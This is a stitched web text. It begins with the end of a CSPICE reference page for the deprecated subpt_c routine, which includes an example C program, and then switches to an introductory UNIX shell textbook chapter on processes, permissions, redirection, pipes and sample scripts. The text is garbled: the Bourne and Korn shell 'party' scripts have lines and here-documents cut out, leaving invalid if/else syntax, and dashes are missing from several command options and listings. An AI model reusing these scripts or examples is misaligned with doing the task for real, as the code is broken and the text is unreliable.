of a segment dropped from the observer to the target's surface, such that the segment is perpendicular to the surface at the contact point `spoint'. When `method' specifies an "intercept" computation, `alt' is still the length of the segment from the observer to the surface point `spoint', but this segment in general is not perpendicular to the surface. None. If any of the listed errors occur, the output arguments are left unchanged. 1) If the input argument `method' is not recognized, the error SPICE(DUBIOUSMETHOD) is signaled. 2) If either of the input body names `target' or `obsrvr' cannot be mapped to NAIF integer codes, the error SPICE(IDCODENOTFOUND) is signaled. 3) If `obsrvr' and `target' map to the same NAIF integer ID codes, the error SPICE(BODIESNOTDISTINCT) is signaled. 4) If frame definition data enabling the evaluation of the state of the target relative to the observer in target body-fixed coordinates have not been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine. 5) If the specified aberration correction is not recognized, the error will be diagnosed and signaled by a routine in the call tree of this routine. 6) If insufficient ephemeris data have been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine. 7) If the triaxial radii of the target body have not been loaded into the kernel pool prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine. 8) The target must be an extended body: if any of the radii of the target body are non-positive, the error will be diagnosed and signaled by routines in the call tree of this routine. 9) If PCK data supplying a rotation model for the target body have not been loaded prior to calling subpt_c, the error will be diagnosed and signaled by a routine in the call tree of this routine. Appropriate SPK, PCK, and frame data must be available to the calling program before this routine is called. Typically the data are made available by loading kernels; however the data may be supplied via subroutine interfaces if applicable.. Either type of file may be loaded via furnsh_c - Frame data: if a frame definition is required to convert the observer and target states to the body-fixed frame of the target, that definition must be available in the kernel pool. Typically the definition is supplied by loading a frame kernel via furnsh_c. In all cases, kernel data are normally loaded once per program run, NOT every time this routine is called. subpt_c computes the sub-observer point on a target body. (The sub-observer point is commonly called the sub-spacecraft point when the observer is a spacecraft.) subpt_c also determines the altitude of the observer above the target body. There are two different popular ways to define the sub-observer point: "nearest point on target to observer" or "target surface intercept of line containing observer and target." These coincide when the target is spherical and generally are distinct otherwise. When comparing sub. In the following example program, the file spk_m_031103-040201_030502.bsp is a binary SPK file containing data for Mars Global Surveyor, Mars, and the Sun for a time interval bracketing the date 2004 JAN 1 12:00:00 UTC. pck00007.tpc is a planetary constants kernel file containing radii and rotation model constants. naif0007.tls is a leapseconds kernel. Find the sub-observer point of the Mars Global Surveyor (MGS) spacecraft on Mars for a specified time. Perform the computation twice, using both the "intercept" and "near point" options. #include <stdio.h> #include "SpiceUsr.h" int main () { #define METHODLEN 25 SpiceChar method [2][METHODLEN] = { "Intercept", "Near point" }; SpiceDouble alt; SpiceDouble et; SpiceDouble lat; SpiceDouble lon; SpiceDouble radius; SpiceDouble spoint [3]; SpiceInt i; /. Load kernel files. ./ furnsh_c ( "naif0007.tls" ); furnsh_c ( "pck00007.tpc" ); furnsh_c ( "spk_m_031103-040201_030502.bsp" ); /. Convert the UTC request time to ET (seconds past J2000 TDB). ./ str2et_c ( "2004 JAN 1 12:00:00", &et ); /. Compute sub-spacecraft point using light time and stellar aberration corrections. Use the "target surface intercept" definition of sub-spacecraft point on the first loop iteration, and use the "near point" definition on the second. ./ for ( i = 0; i < 2; i++ ) { subpt_c ( method[i], "MARS", et, "LT+S", "MGS", spoint, &alt ); /. Convert rectangular coordinates to planetocentric latitude and longitude. Convert radians to degrees. ./ reclat_c ( spoint, &radius, &lon, &lat ); lon *= dpr_c (); lat *= dpr_c (); /. Write the results. ./ printf ( "\n" "Computation method: %s\n" "\n" " Radius (km) = %25.15e\n" " Planetocentric Latitude (deg) = %25.15e\n" " Planetocentric Longitude (deg) = %25.15e\n" " Altitude (km) = %25.15e\n" "\n", method[i], radius, lat, lon, alt ); } return ( 0 ); } When this program is executed, the output will be: Computation method: Intercept Radius (km) = 3.387970765126046e+03 Planetocentric Latitude (deg) = -3.970227239033073e+01 Planetocentric Longitude (deg) = -1.592266633611679e+02 Altitude (km) = 3.731735060549094e+02 Computation method: Near point Radius (km) = 3.387984503271711e+03 Planetocentric Latitude (deg) = -3.966593293571449e+01 Planetocentric Longitude (deg) = -1.592266633611679e+02 Altitude (km) = 3.731666361282019e+02 C.H. Acton (JPL) N.J. Bachman (JPL) J.E. McLean (JPL) -CSPICE Version 1.0.5, 10-JUL-2014 (NJB) Discussion of light time corrections was updated. Assertions that converged light time corrections are unlikely to be useful were removed. -CSPICE Version 1.0.4, 19-MAY-2010 (BVS) Index line now states that this routine is deprecated. -CSPICE Version 1.0.3, 07-FEB-2008 (NJB) Abstract now states that this routine is deprecated. -CSPICE Version 1.0.2, 22-JUL-2004 (NJB) Updated header to indicate that the `target' and `observer' input arguments can now contain string representations of integers. -CSPICE Version 1.0.1, 27-JUL-2003 (NJB) (CHA) Various header corrections were made. The example program was upgraded to use real kernels, and the program's output is shown. -CSPICE Version 1.0.0, 31-MAY-1999 (NJB) (JEM) DEPRECATED sub-observer point Wed Apr 5 17:54:45 2017
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpt_c.html
CC-MAIN-2019-30
refinedweb
1,588
57.37
The shell is a special program used as an interface between the user and the heart of the UNIX operating system, a program called the kernel, as shown in Figure 1.1. The kernel is loaded into memory at boot-up time and manages the system until shutdown. It creates and controls processes, and manages memory, file systems, communications, and so forth. All other programs, including shell programs, reside out on the disk. The kernel loads those programs into memory, executes them, and cleans up the system when they terminate. The shell is a utility program that starts up when you log on. It allows users to interact with the kernel by interpreting commands that are typed either at the command line or in a script file. When you log on, an interactive shell starts up and prompts you for input. After you type a command, it is the responsibility of the shell to (a) parse the command line; (b) handle wildcards, redirection, pipes, and job control; and (c) search for the command, and if found, execute that command. When you first learn UNIX, you spend most of your time executing commands from the prompt. You use the shell interactively. If you type the same set of commands on a regular basis, you may want to automate those tasks. This can be done by putting the commands in a file, called a script file, and then executing the file. A shell script is much like a batch file: It is a list of UNIX commands typed into a file, and then the file is executed. More sophisticated scripts contain programming constructs for making decisions, looping, file testing, and so forth. Writing scripts not only requires learning programming constructs and techniques, but assumes that you have a good understanding of UNIX utilities and how they work. There are some utilities, such as grep, sed, and awk, that are extremely powerful tools used in scripts for the manipulation of command output and files. After you have become familiar with these tools and the programming constructs for your particular shell, you will be ready to start writing useful scripts. When executing commands from within a script, you are using the shell as a programming language. The three prominent and supported shells on most UNIX systems are the Bourne shell (AT&T shell), the C shell (Berkeley shell), and the Korn shell (superset of the Bourne shell). All three of these behave pretty much the same way when running interactively, but have some differences in syntax and efficiency when used as scripting languages. The Bourne shell is the standard UNIX shell, and is used to administer the system. Most of the system administration scripts, such as the rc start and stop scripts and shutdown are Bourne shell scripts, and when in single user mode, this is the shell commonly used by the administrator when running as root. This shell was written at AT&T and is known for being concise, compact, and fast. The default Bourne shell prompt is the dollar sign ($). The C shell was developed at Berkeley and added a number of features, such as command line history, aliasing, built-in arithmetic, filename completion, and job control. The C shell has been favored over the Bourne shell by users running the shell interactively, but administrators prefer the Bourne shell for scripting, because Bourne shell scripts are simpler and faster than the same scripts written in C shell. The default C shell prompt is the percent sign (%). The Korn shell is a superset of the Bourne shell written by David Korn at AT&T. A number of features were added to this shell above and beyond the enhancements of the C shell. Korn shell features include an editable history, aliases, functions, regular expression wildcards, built-in arithmetic, job control, coprocessing, and special debugging features. The Bourne shell is almost completely upward-compatible with the Korn shell, so older Bourne shell programs will run fine in this shell. The default Korn shell prompt is the dollar sign ($). Although often called "Linux" shells, Bash and TC shells are freely available and can be compiled on any UNIX system; in fact, the shells are now bundled with Solaris 8 and Sun's UNIX operating system. But when you install Linux, you will have access to the GNU shells and tools, and not the standard UNIX shells and tools. Although Linux supports a number of shells, the Bourne Again shell (bash) and the TC shell (tcsh) are by far the most popular. The Z shell is another Linux shell that incorporates a number of features from the Bourne Again shell, the TC shell, and the Korn shell. The Public Domain Korn shell (pdksh) a Korn shell clone, is also available, and for a fee you can get AT&T's Korn shell, not to mention a host of other unknown smaller shells. To see what shells are available under your version of Linux, look in the file, /etc/shell. To change to one of the shells listed in /etc/shell, type the chsh command and the name of the shell. For example, to change permanently to the TC shell, use the chsh command. At the prompt, type: chsh /bin/tcsh The first significant, standard UNIX shell was introduced in V7 (seventh edition of AT&T) UNIX in late 1979, and was named after its creator, Stephen Bourne. The Bourne shell as a programming language is based on a language called Algol, and was primarily used to automate system administration tasks. Although popular for its simplicity and speed, it lacks many of the features for interactive use, such as history, aliasing, and job control. Enter bash, the Bourne Again shell, which was developed by Brian Fox of the Free Software Foundation under the GNU copyright license and is the default shell for the very popular Linux operating system. It was intended to conform to the IEEE POSIX P1003.2/ISO 9945.2 Shell and Tools standard. Bash also offers a number of new features (both at the interactive and programming level) missing in the original Bourne shell (yet Bourne shell scripts will still run unmodified). It also incorporates the most useful features of both the C shell and Korn shell. It's big. The improvements over Bourne shell are: command line history and editing, directory stacks, job control, functions, aliases, arrays, integer arithmetic (in any base from 2 to 64), and Korn shell features, such as extended metacharacters, select loops for creating menus, the let command, etc. The C shell, developed at the University of California at Berkeley in the late 1970s, was released as part of 2BSD UNIX. The shell, written primarily by Bill Joy, offered a number of additional features not provided in the standard Bourne shell. The C shell is based on the C programming language, and when used as a programming language, it shares a similar syntax. It also offers enhancements for interactive use, such as command line history, aliases, and job control. Because the shell was designed on a large machine and a number of additional features were added, the C shell has a tendency to be slow on small machines and sluggish even on large machines when compared to the Bourne shell. The TC shell is an expanded version of the C shell. Some of the new features are: command line editing (emacs and vi), scrolling the history list, advanced filename, variable, and command completion, spelling correction, scheduling jobs, automatic locking and logout, time stamps in the history list, etc. It's also big. With both the Bourne shell and the C shell available, the UNIX user now had a choice, and conflicts arose over which was the better shell. David Korn, from AT&T, invented the Korn shell in the mid-1980s. It was released in 1986 and officially became part of the SVR4 distribution of UNIX in 1988. The Korn shell, really a superset of the Bourne shell, runs not only on UNIX systems, but also on OS/2, VMS, and DOS. It provides upward-compatibility with the Bourne shell, adds many of the popular features of the C shell, and is fast and efficient. The Korn shell has gone through a number of revisions. The most widely used version of the Korn shell is the 1988 version, although the 1993 version is gaining popularity. Linux users may find they are running the free version of the Korn shell, called The Public Domain Korn shell, or simply pdksh, a clone of David Korn's 1988 shell. It is free and portable and currently work is underway to make it fully compatible with its namesake, Korn shell, and to make it POSIX compliant. Also available is the Z shell (zsh), another Korn shell clone with TC shell features, written by Paul Falsted, and freely available at a number of Web sites. One of the major functions of a shell is to interpret commands entered at the command line prompt when running interactively. The shell parses the command line, breaking it into words (called tokens), separated by whitespace, which consists of tabs, spaces, or a newline. If the words contain special metacharacters, the shell evaluates them. The shell handles file I/O and background processing. After the command line has been processed, the shell searches for the command and starts its execution. Another important function of the shell is to customize the user's environment, normally done in shell initialization files. These files contain definitions for setting terminal keys and window characteristics; setting variables that define the search path, permissions, prompts, and the terminal type; and setting variables that are required for specific applications such as windows, text-processing programs, and libraries for programming languages. The Korn shell and C shell also provide further customization with the addition of history and aliases, built-in variables set to protect the user from clobbering files or inadvertently logging out, and to notify the user when a job has completed. The shell can also be used as an interpreted programming language. Shell programs, also called scripts, consist of commands listed in a file. The programs are created in an editor (although on-line scripting is permitted). They consist of UNIX commands interspersed with fundamental programming constructs such as variable assignment, conditional tests, and loops. You do not have to compile shell scripts. The shell interprets each line of the script as if it had been entered from the keyboard. Because the shell is responsible for interpreting commands, it is necessary for the user to have an understanding of what those commands are. See Appendix A for a list of useful commands. The shell is ultimately responsible for making sure that any commands typed at the prompt get properly executed. Included in those responsibilities are: Reading input and parsing the command line. Evaluating special characters. Setting up pipes, redirection, and background processing. Handling signals. Setting up programs for execution. Each of these topics is discussed in detail as it pertains to a particular shell. When you start up your system, the first process is called init. Each process has a process identification number associated with it, called the PID. Since init is the first process, its PID is 1. The init process initializes the system and then starts another process to open terminal lines and set up the standard input (stdin), standard output (stdout), and standard error (stderr), which are all associated with the terminal. The standard input normally comes from the keyboard; the standard output and standard error go to the screen. At this point, a login prompt would appear on your terminal. After you type your login name, you will be prompted for a password. The /bin/login program then verifies your identity by checking the first field in the passwd file. If your username is there, the next step is to run the password you typed through an encryption program to determine if it is indeed the correct password. Once your password is verified, the login program sets up an initial environment consisting of variables that define the working environment that will be passed on to the shell. The HOME, SHELL, USER, and LOGNAME variables are assigned values extracted from information in the passwd file. The HOME variable is assigned your home directory; the SHELL variable is assigned the name of the login shell, which is the last entry in the passwd file. The USER and/or LOGNAME variables are assigned your login name. A search path variable is set so that commonly used utilities may be found in specified directories. When login has finished, it will execute the program found in the last entry of the passwd file. Normally, this program is a shell. If the last entry in the passwd file is /bin/csh, the C shell program is executed. If the last entry in the passwd file is /bin/sh or is null, the Bourne shell starts up. If the last entry is /bin/ksh, the Korn shell is executed. This shell is called the login shell. After the shell starts up, it checks for any systemwide initialization files set up by the system administrator and then checks your home directory to see if there are any shell-specific initialization files there. If any of these files exist, they are executed. The initialization files are used to further customize the user environment. After the commands in those files have been executed, a prompt appears on the screen. The shell is now waiting for your input. When you type a command at the prompt, the shell reads a line of input and parses the command line, breaking the line into words, called tokens. Tokens are separated by spaces and tabs and the command line is terminated by a newline.[1] The shell then checks to see whether the first word is a built-in command or an executable program located somewhere out on disk. If it is built-in, the shell will execute the command internally. Otherwise, the shell will search the directories listed in the path variable to find out where the program resides. If the command is found, the shell will fork a new process and then execute the program. The shell will sleep (or wait) until the program finishes execution and then, if necessary, will report the status of the exiting program. A prompt will appear and the whole process will start again. The order of processing the command line is as follows: History substitution is performed (if applicable). Command line is broken up into tokens, or words. History is updated (if applicable). Quotes are processed. Alias substitution and functions are defined (if applicable). Redirection, background, and pipes are set up. Variable substitution ($user, $name, etc.) is performed. Command substitution (echo for today is 'date') is performed. Filename substitution, called globbing (cat abc.??, rm *.c, etc.) is performed. Program execution. When a command is executed, it is an alias, a function, a built-in command, or an executable program on disk. Aliases are abbreviations (nicknames) for existing commands and apply to the C, TC, Bash, and Korn shells. Functions apply to the Bourne (introduced with AT&T System V, Release 2.0), Bash, and Korn shells. They are groups of commands organized as separate routines. Aliases and functions are defined within the shell's memory. Built-in commands are internal routines in the shell, and executable programs reside on disk. The shell uses the path variable to locate the executable programs on disk and forks a child process before the command can be executed. This takes time. When the shell is ready to execute the command, it evaluates command types in the following order:[2] Aliases Keywords Functions (bash) Built-in commands Executable programs If, for example, the command is xyz the shell will check to see if xyz is an alias. If not, is it a built-in command or a function? If neither of those, it must be an executable command residing on the disk. The shell then must search the path for the command. A process is a program in execution and can be identified by its unique PID (process identification) number. The kernel controls and manages processes. A process consists of the executable program, its data and stack, program and stack pointer, registers, and all the information needed for the program to run. When you start the shell, it is a process. The shell belongs to a process group identified by the group's PID. Only one process group has control of the terminal at a time and is said to be running in the foreground. When you log on, your shell is in control of the terminal and waits for you to type a command at the prompt. The shell can spawn other processes. In fact, when you enter a command at the prompt or from a shell script, the shell has the responsibility of finding the command either in its internal code (built-in) or out on the disk and then arranging for the command to be executed. This is done with calls to the kernel, called system calls. A system call is a request for kernel services and is the only way a process can access the system's hardware. There are a number of system calls that allow processes to be created, executed, and terminated. (The shell provides other services from the kernel when it performs redirection and piping, command substitution, and the execution of user commands.) The system calls used by the shell to cause new processes to run are discussed in the following sections. See Figure 1.2. The ps Command. The ps command with its many options displays a list of the processes currently running in a number of formats. Example 1.1 shows all processes that are running by users on a Linux system. (See Appendix A for ps and its options.) $ ps au (BSD/Linux ps) (use ps -ef for SVR4) USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND ellie 456 0.0 1.3 1268 840 1 S 13:23 0:00 -bash ellie 476 0.0 1.0 1200 648 1 S 13:23 0:00 sh /usr/X11R6/bin/sta ellie 478 0.0 1.0 2028 676 1 S 13:23 0:00 xinit /home/ellie/.xi ellie 480 0.0 1.6 1852 1068 1 S 13:23 0:00 fvwm2 ellie 483 0.0 1.3 1660 856 1 S 13:23 0:00 /usr/X11R6/lib/X11/fv ellie 484 0.0 1.3 1696 868 1 S 13:23 0:00 /usr/X11R6/lib/X11/fv ellie 487 0.0 2.0 2348 1304 1 S 13:23 0:00 xclock -bg #c0c0c0 -p ellie 488 0.0 1.1 1620 724 1 S 13:23 0:00 /usr/X11R6/lib/X11/fv ellie 489 0.0 2.0 2364 1344 1 S 13:23 0:00 xload -nolabel -bg gr ellie 495 0.0 1.3 1272 848 p0 S 13:24 0:00 -bash ellie 797 0.0 0.7 852 484 p0 R 14:03 0:00 ps au root 457 0.0 0.4 724 296 2 S 13:23 0:00 /sbin/mingetty tty2 root 458 0.0 0.4 724 296 3 S 13:23 0:00 /sbin/mingetty tty3 root 459 0.0 0.4 724 296 4 S 13:23 0:00 /sbin/mingetty tty4 root 460 0.0 0.4 724 296 5 S 13:23 0:00 /sbin/mingetty tty5 root 461 0.0 0.4 724 296 6 S 13:23 0:00 /sbin/mingetty tty6 root 479 0.0 4.5 12092 2896 1 S 13:23 0:01 X :0 root 494 0.0 2.5 2768 1632 1 S 13:24 0:00 nxterm -ls -sb -fn The fork System Call. A process is created in UNIX with the fork system call. The fork system call creates a duplicate of the calling process. The new process is called the child and the process that created it is called the parent. The child process starts running right after the call to fork, and both processes initially share the CPU. The child process has a copy of the parent's environment, open files, real and user identifications, umask, current working directory, and signals. When you type a command, the shell parses the command line and determines whether the first word is a built-in command or an executable command that resides out on the disk. If the command is built-in, the shell handles it, but if on the disk, the shell invokes the fork system call to make a copy of itself (Figure 1.3). Its child will search the path to find the command, as well as set up the file descriptors for redirection, pipes, command substitution, and background processing. While the child shell works, the parent normally sleeps. (See wait, below.) The wait System Call. The parent shell is programmed to go to sleep (wait) while the child takes care of details such as handling redirection, pipes, and background processing. The wait system call causes the parent process to suspend until one of its children terminates. If wait is successful, it returns the PID of the child that died and the child's exit status. If the parent does not wait and the child exits, the child is put in a zombie state (suspended animation) and will stay in that state until either the parent calls wait or the parent dies.[3] If the parent dies before the child, the init process adopts any orphaned zombie process. The wait system call, then, is not just used to put a parent to sleep, but also to ensure that the process terminates properly. The exec System Call. After you enter a command at the terminal, the shell normally forks off a new shell process: the child process. As mentioned earlier, the child shell is responsible for causing the command you typed to be executed. It does this by calling the exec system call. Remember, the user command is really just an executable program. The shell searches the path for the new program. If it is found, the shell calls the exec system call with the name of the command as its argument. The kernel loads this new program into memory in place of the shell that called it. The child shell, then, is overlaid with the new program. The new program becomes the child process and starts executing. Although the new process has its own local variables, all environment variables, open files, signals, and the current working directory are passed to the new process. This process exits when it has finished, and the parent shell wakes up. The exit System Call. A new program can terminate at any time by executing the exit call. When a child process terminates, it sends a signal (sigchild) and waits for the parent to accept its exit status. The exit status is a number between 0 and 255. An exit status of zero indicates that the program executed successfully, and a nonzero exit status means that the program failed in some way. For example, if the command ls had been typed at the command line, the parent shell would fork a child process and go to sleep. The child shell would then exec (overlay) the ls program in its place. The ls program would run in place of the child, inheriting all the environment variables, open files, user information, and state information. When the new process finished execution, it would exit and the parent shell would wake up. A prompt would appear on the screen, and the shell would wait for another command. If you are interested in knowing how a command exited, each shell has a special built-in variable that contains the exit status of the last command that terminated. (All of this will be explained in detail in the individual shell chapters.) See Figure 1.4 for an example of process creation and termination. (C Shell) 1 % cp filex filey % echo $status 0 2 % cp xyz Usage: cp [-ip] f1 f2; or: cp [-ipr] f1 ... fn d2 % echo $status 1 (Bourne and Korn Shells) 3 $ cp filex filey $ echo $? 0 $ cp xyz Usage: cp [-ip] f1 f2; or: cp [-ipr] f1 ... fn d2 $ echo $? 1 When you log on, the shell starts up and inherits a number of variables, I/O streams, and process characteristics from the /bin/login program that started it. In turn, if another shell is spawned (forked) from the login or parent shell, that child shell (subshell) will inherit certain characteristics from its parent. A subshell may be started for a number of reasons: for handling background processing, for handling groups of commands, or for executing scripts. The child shell inherits an environment from its parent. The environment consists of process permissions (who owns the process), the working directory, the file creation mask, special variables, open files, and signals. When you log on, the shell is given an identity. It has a real user identification (UID), one or more real group identifications (GID), and an effective user identification and effective group identification (EUID and EGID). The EUID and EGID are initially the same as the real UID and GID. These ID numbers are found in the passwd file and are used by the system to identify users and groups. The EUID and EGID determine what permissions a process has access to when reading, writing, or executing files. If the EUID of a process and the real UID of the owner of the file are the same, the process has the owner's access permissions for the file. If the EGID and real GID of a process are the same, the process has the owner's group privileges. The real UID, from the /etc/passwd file, is a positive integer associated with your login name. The real UID is the third field in the password file. When you log on, the login shell is assigned the real UID and all processes spawned from the login shell inherit its permissions. Any process running with a UID of zero belongs to root (the superuser) and has root privileges. The real group identification, the GID, associates a group with your login name. It is found in the fourth field of the password file. The EUID and EGID can be changed to numbers assigned to a different owner. By changing the EUID (or EGID[4]) to another owner, you can become the owner of a process that belongs to someone else. Programs that change the EUID or EGID to another owner are called setuid or setgid programs. The /bin/passwd program is an example of a setuid program that gives the user root privileges. Setuid programs are often sources for security holes. The shell allows you to create setuid scripts, and the shell itself may be a setuid program. When a file is created, it is given a set of default permissions. These permissions are determined by the program creating the file. Child processes inherit a default mask from their parents. The user can change the mask for the shell by issuing the umask command at the prompt or by setting it in the shell's initialization files. The umask command is used to remove permissions from the existing mask. Initially, the umask is 000, giving a directory 777 (rwxrwxrwx) permissions and a file 666 (rw rw rw ) permissions as the default. On most systems, the umask is assigned a value of 022 by the /bin/login program or the /etc/profile initialization file. The umask value is subtracted from the default settings for both the directory and file permissions as follows: 777 (Directory) 666 (File) 022 (umask value) 022 (umask value) ------- --------- 755 644 Result: drwxr-xr-x -rw-r--r-- After the umask is set, all directories and files created by this process are assigned the new default permissions. In this example, directories will be given read, write, and execute for the owner; read and execute for the group; and read and execute for the rest of the world (others). Any files created will be assigned read and write for the owner, and read for the group and others. To change permissions on individual directories and permissions, the chmod command is used. There is one owner for every UNIX file. Only the owner or the superuser can change the permissions on a file or directory by issuing the chmod command. The following example illustrates the permissions modes. A group may have a number of members, and the owner of the file may change the group permissions on a file so that the group can enjoy special privileges. The chown command changes the owner and group on files and directories. Only the owner or superuser can invoke it. On BSD versions of UNIX, only the superuser, root, can change ownership. Every UNIX file has a set of permissions associated with it to control who can read, write, or execute the file. A total of nine bits constitutes the permissions on a file. The first set of three bits controls the permissions of the owner of the file, the second set controls the permissions of the group, and the last set controls the permissions of everyone else. The permissions are stored in the mode field of the file's inode. The chmod command changes permissions on files and directories. The user must own the files to change permissions on them.[5] Table 1.1 illustrates the eight possible combinations of numbers used for changing permissions. The symbolic notation for chmod is as follows: r = read; w = write; x = execute; u = user; g = group; o = others; a = all. 1 $ chmod 755 file $ ls l file rwxr xr x 1 ellie 0 Mar 7 12:52 file 2 $ chmod g+w file $ ls -l file rwxrwxr-x 1 ellie 0 Mar 7 12:54 file 3 $ chmod go-rx file $ ls -l file rwx-w---- 1 ellie 0 Mar 7 12:56 file 4 $ chmod a=r file $ ls -l file r--r--r-- 1 ellie 0 Mar 7 12:59 file (The Command Line) 1 $ chown steve filex 2 $ ls -l (The Output) -rwxrwxr-x 1 steve groupa 170 Jul 28:20 filex The Working Directory. When you log in, you are given a working directory within the file system, called the home directory. The working directory is inherited by processes spawned from this shell. Any child process of this shell can change its own working directory, but the change will have no effect on the parent shell. The cd command, used to change the working directory, is a shell built-in command. Each shell has its own copy of cd. A built-in command is executed directly by the shell as part of the shell's code; the shell does not perform the fork and exec system calls when executing built-in commands. If another shell (script) is forked from the parent shell, and the cd command is issued in the child shell, the directory will be changed in the child shell. When the child exits, the parent shell will be in the same directory it was in before the child started. 1 % cd / 2 % pwd / 3 % sh 4 $ cd /home 5 $ pwd /home 6 $ exit 7 % pwd / % Variables. The shell can define two types of variables: local and environment. The variables contain information used for customizing the shell, and information required by other processes so that they will function properly. Local variables are private to the shell in which they are created and not passed on to any processes spawned from that shell. Environment variables, on the other hand, are passed from parent to child process, from child to grandchild, and so on. Some of the environment variables are inherited by the login shell from the /bin/login program. Others are created in the user initialization files, in scripts, or at the command line. If an environment variable is set in the child shell, it is not passed back to the parent. File Descriptors., 0, 1, and 2, are assigned to your terminal. File descriptor 0 is standard input (stdin), 1 is standard output (stdout), and 2 is standard error (stderr). When you open a file, the next available descriptor is 3, and it will be assigned to the new file. If all the available file descriptors are in use,[6] a new file cannot be opened. Redirection. When a file descriptor is assigned to something other than a terminal, it is called I/O redirection. The shell performs redirection of output to a file by closing the standard output file descriptor, 1 (the terminal), and then assigning that descriptor to the file (Figure 1.5).When redirecting standard input, the shell closes file descriptor 0 (the terminal) and assigns that descriptor to a file (Figure 1.6). The Bourne and Korn shells handle errors by assigning a file to file descriptor 2 (Figure 1.7). The C shell, on the other hand, goes through a more complicated process to do the same thing (Figure 1.8) 1 % who > file 2 % cat file1 file2 >> file3 3 % mail tom < file 4 % find / -name file -print 2> errors 5 % ( find / -name file -print > /dev/tty) >& errors Pipes. Pipes allow the output of one command to be sent to the input of another command. The shell implements pipes by closing and opening file descriptors; however, instead of assigning the descriptors to a file, it assigns them to a pipe descriptor created with the pipe system call. After the parent creates the pipe file descriptors, it forks a child process for each command in the pipeline. By having each process manipulate the pipe descriptors, one will write to the pipe and the other will read from it. The pipe is merely a kernel buffer from which both processes can share data, thus eliminating the need for intermediate temporary files. After the descriptors are set up, the commands are exec'ed concurrently. The output of one command is sent to the buffer, and when the buffer is full or the command has terminated, the command on the right-hand side of the pipe reads from the buffer. The kernel synchronizes the activities so that one process waits while the other reads from or writes from the buffer. The syntax of the pipe command is who | wc The shell sends the output of the who command as input to the wc command. This is accomplished with the pipe system call. The parent shell calls the pipe system call, which creates two pipe descriptors, one for reading from the pipe and one for writing to it. The files associated with the pipe descriptors are kernel-managed I/O buffers used to temporarily store data, thus saving you the trouble of creating temporary files. Figures 1.9 through 1.13 illustrate the steps for implementing the pipe. The parent shell calls the pipe system call. Two file descriptors are returned: one for reading from the pipe and one for writing to the pipe. The file descriptors assigned are the next available descriptors in the file-descriptor (fd) table, fd 3 and fd 4. See Figure 1.9. For each command, who and wc, the parent forks a child process. Both child processes get a copy of the parent's open file descriptors. See Figure 1.10. The first child closes its standard output. It then duplicates (the dup system call) file descriptor 4, the one associated with writing to the pipe. The dup system call copies fd 4 and assigns the copy to the lowest available descriptor in the table, fd 1. After it makes the copy, the dup call closes fd 4. The child will now close fd 3 because it does not need it. This child wants its standard output to go to the pipe. See Figure 1.11. Child 2 closes its standard input. It then duplicates (dups) fd 3, which is associated with reading from the pipe. By using dup, a copy of fd 3 is created and assigned to the lowest available descriptor. Since fd 0 was closed, it is the lowest available descriptor. Dup closes fd 3. The child closes fd 4. Its standard input will come from the pipe. See Figure 1.12. The who command is executed in place of Child 1 and the wc command is executed to replace Child 2. The output of the who command goes into the pipe and is read by the wc command from the other end of the pipe. See Figure 1.13. A signal sends a message to a process and normally causes the process to terminate, usually owing to some unexpected event such as a segmentation violation, bus error, or power failure. You can send signals to a process by pressing the Break, Delete, Quit, or Stop keys, and all processes sharing the terminal are affected by the signal sent. You can kill a process with the kill command. By default, most signals terminate the program. The shells allow you to handle signals coming into your program, either by ignoring them or by specifying some action to be taken when a specified signal arrives. The C shell is limited to handling ^C (Control-C). When the shell is used as a programming language, commands and shell control constructs are typed in an editor and saved to a file, called a script. The lines from the file are read and executed one at a time by the shell. These programs are interpreted, not compiled. Compiled programs are converted into machine language before they are executed. Therefore, shell programs are usually slower than binary executables, but they are easier to write and are used mainly for automating simple tasks. Shell programs can also be written interactively at the command line, and for very simple tasks, this is the quickest way. However, for more complex scripting, it is easier to write scripts in an editor (unless you are a really great typist). The following script can be executed by any shell to output the same results. Figure 1.14 illustrates the creation of a script called doit and how it fits in with already existing UNIX programs/utilities/commands. At first glance, the following three programs look very similar. They are. And they all do the same thing. The main difference is the syntax. After you have worked with all three shells for some time, you will quickly adapt to the differences and start formulating your own opinions about which shell is your favorite. A detailed comparison of differences among the C, Bourne, and Korn shells is found in Appendix B. The following scripts send a mail message to a list of users, inviting each of them to a party. The place and time of the party are set in variables. The people to be invited are selected from a file called guests. A list of foods is stored in a word list, and each person is asked to bring one of the foods from the list. If there are more users than food items, the list is reset so that each user is asked to bring a different food. The only user who is not invited is the user root. 1 #!/bin/csh f 2 # The Party Program Invitations to friends from the "guest" file 3 set guestfile = ~/shell/guests 4 if ( ! e "$guestfile" ) then echo "$guestfile:t non existent" exit 1 endif 5 setenv PLACE "Sarotini's" @ Time = 'date +%H' + 1 set food = ( cheese crackers shrimp drinks "hot dogs" sandwiches ) 6 foreach person ( 'cat $guestfile' ) if ( $person =~ root ) continue 7 mail v s "Party" $person << FINIS # Start of here document Hi ${person}! Please join me at $PLACE for a party! Meet me at $Time o'clock. I'll bring the ice cream. Would you please bring $food[1] and anything else you would like to eat? Let me know if you can't make it. Hope to see you soon. Your pal, ellie@'hostname' # or 'uname -n' FINIS 8 shift food if ( $#food == 0 ) then set food = ( cheese crackers shrimp drinks "hot dogs" sandwiches ) endif 9 end echo "Bye..." 1 #!/bin/sh 2 # The Party Program Invitations to friends from the "guest" file 3 guestfile=/home/jody/ellie/shell/guests 4 if [ ! f "$guestfile" ] then echo "'basename $guestfile' non existent" exit 1 fi 5 PLACE="Sarotini's" export PLACE Time='date +%H' Time='expr $Time + 1' set cheese crackers shrimp drinks "hot dogs" sandwiches 6 for person in 'cat $guestfile' do if [ $person =~ root ] then continue else [ $# eq 0 ] then set cheese crackers shrimp drinks "hot dogs" sandwiches fi fi 9 done echo "Bye..." 1 #!/bin/ksh 2 # The Party Program Invitations to friends from the "guest" file 3 guestfile=~/shell/guests 4 if [[ ! a "$guestfile" ]] then print "${guestfile##*/} non existent" exit 1 fi 5 export PLACE="Sarotini's" (( Time=$(date +%H) + 1 )) set cheese crackers shrimp drinks "hot dogs" sandwiches 6 for person in $(< $guestfile) do if [[ $person = root ]] then continue else # Start of here document (( $# == 0 )) then set cheese crackers shrimp drinks "hot dogs" sandwiches fi fi 9 done print "Bye..." [1] The process of breaking the line up into tokens is called lexical analysis. [2] Numbers 3 and 4 are reversed for Bourne and Korn(88) shells. Number 3 does not apply for C and 